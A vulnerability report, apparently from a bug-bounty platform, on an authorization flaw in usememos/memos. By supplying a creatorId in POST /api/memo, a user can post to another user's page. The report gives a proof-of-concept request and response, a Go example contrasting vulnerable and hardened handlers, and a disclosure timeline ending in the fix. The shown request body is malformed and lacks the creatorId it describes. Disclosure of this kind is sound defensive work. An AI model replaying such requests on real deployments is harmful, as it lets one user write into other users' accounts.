An attacker can post a message on another user's memos page in usememos/memos


Reported on Dec 26th 2022


An attacker can post malicious content to another user's memos page via a POST request: the attacker simply adds a creatorId to the request body and sends it with Burp Suite.

Here is the video PoC:

Proof of Concept

POST /api/memo HTTP/2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

"content":"post this message in demouser wall ","visibility":"PRIVATE",

Server Response:

HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}


This vulnerability affects all users in memos.
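The root cause described above is a broken object-level authorization check: the server takes the memo owner from a client-controlled creatorId instead of from the authenticated session. The Go program below is an added example and is not code from the memos project or from this report. It contrasts a hypothetical vulnerable handler core (owner pre-filled from the session, then silently overwritten when the JSON body is decoded over the same struct) with two hardened variants: assign ownership from the session after decoding and log any mismatch as a tampering signal, or reject the request outright when the body carries a field the client may not set. The struct and function names, the session user id 7 and the request body are constructed for the example.

```go
package main

import (
	"bytes"
	"encoding/json"
	"errors"
	"fmt"
	"log"
)

// Memo mirrors the fields visible in the report's server response.
type Memo struct {
	ID         int    `json:"id"`
	CreatorID  int    `json:"creatorId"`
	Content    string `json:"content"`
	Visibility string `json:"visibility"`
}

// memoCreate is a hypothetical request struct for POST /api/memo; it is not
// the memos project's own type. Exposing creatorId to JSON is the defect:
// any client can set it.
type memoCreate struct {
	CreatorID  int    `json:"creatorId"`
	Content    string `json:"content"`
	Visibility string `json:"visibility"`
}

var nextMemoID = 1054 // constructed starting id, matching the sample response

func newMemo(req memoCreate) Memo {
	m := Memo{ID: nextMemoID, CreatorID: req.CreatorID, Content: req.Content, Visibility: req.Visibility}
	nextMemoID++
	return m
}

// createMemoVulnerable shows the broken pattern: the owner is pre-filled from
// the session, then the body is decoded over the same struct, so a
// client-supplied "creatorId" overwrites the authenticated user's id.
func createMemoVulnerable(sessionUserID int, body []byte) (Memo, error) {
	req := memoCreate{CreatorID: sessionUserID}
	if err := json.Unmarshal(body, &req); err != nil {
		return Memo{}, err
	}
	return newMemo(req), nil
}

// createMemoHardened decodes first and only then assigns ownership from the
// session, so the client can never choose whose wall the memo lands on.
// A body naming a different creatorId is logged as a tampering signal.
func createMemoHardened(sessionUserID int, body []byte) (Memo, error) {
	var req memoCreate
	if err := json.Unmarshal(body, &req); err != nil {
		return Memo{}, err
	}
	if req.CreatorID != 0 && req.CreatorID != sessionUserID {
		log.Printf("memo create: user %d supplied creatorId %d; ignoring", sessionUserID, req.CreatorID)
	}
	req.CreatorID = sessionUserID // server-side authority, never client input
	if req.Content == "" {
		return Memo{}, errors.New("content must not be empty")
	}
	return newMemo(req), nil
}

// createMemoStrict is the alternative: bind only the fields a client is
// allowed to send and reject anything else with a 400-style error.
func createMemoStrict(sessionUserID int, body []byte) (Memo, error) {
	type clientFields struct {
		Content    string `json:"content"`
		Visibility string `json:"visibility"`
	}
	dec := json.NewDecoder(bytes.NewReader(body))
	dec.DisallowUnknownFields() // "creatorId" is unknown here, so decoding fails
	var cf clientFields
	if err := dec.Decode(&cf); err != nil {
		return Memo{}, fmt.Errorf("bad request: %w", err)
	}
	return newMemo(memoCreate{CreatorID: sessionUserID, Content: cf.Content, Visibility: cf.Visibility}), nil
}

func main() {
	// Constructed body in the shape of the report: the session user (id 7)
	// names another account's id 104 as the creator.
	attack := []byte(`{"creatorId":104,"content":"post this message in demouser wall ","visibility":"PRIVATE"}`)
	v, _ := createMemoVulnerable(7, attack)
	h, _ := createMemoHardened(7, attack)
	_, err := createMemoStrict(7, attack)
	fmt.Printf("vulnerable: creatorId=%d\nhardened: creatorId=%d\nstrict: err=%v\n", v.CreatorID, h.CreatorID, err)
}
```

The log line in the hardened variant is the detection hook: a client that sends a creatorId differing from its own session is either a stale frontend or someone probing for exactly this class of bug, and either way the event is worth alerting on.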

We are processing your report and will contact the usememos/memos team within 24 hours. (a year ago)
A GitHub Issue asking the maintainers to create a exists (a year ago)
Nguyen Minh Quang modified the report (a year ago)
We have contacted a member of the usememos/memos team and are waiting to hear back (a year ago)
STEVEN validated this vulnerability (a year ago)
quangdaik2362001 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7 (a year ago)


Can you assign this as a CVE?

STEVEN marked this as fixed in 0.9.1 with commit 3556ae (a year ago)
STEVEN has been awarded the fix bounty
This vulnerability has now been published (a year ago)
resource.go#L23 has been validated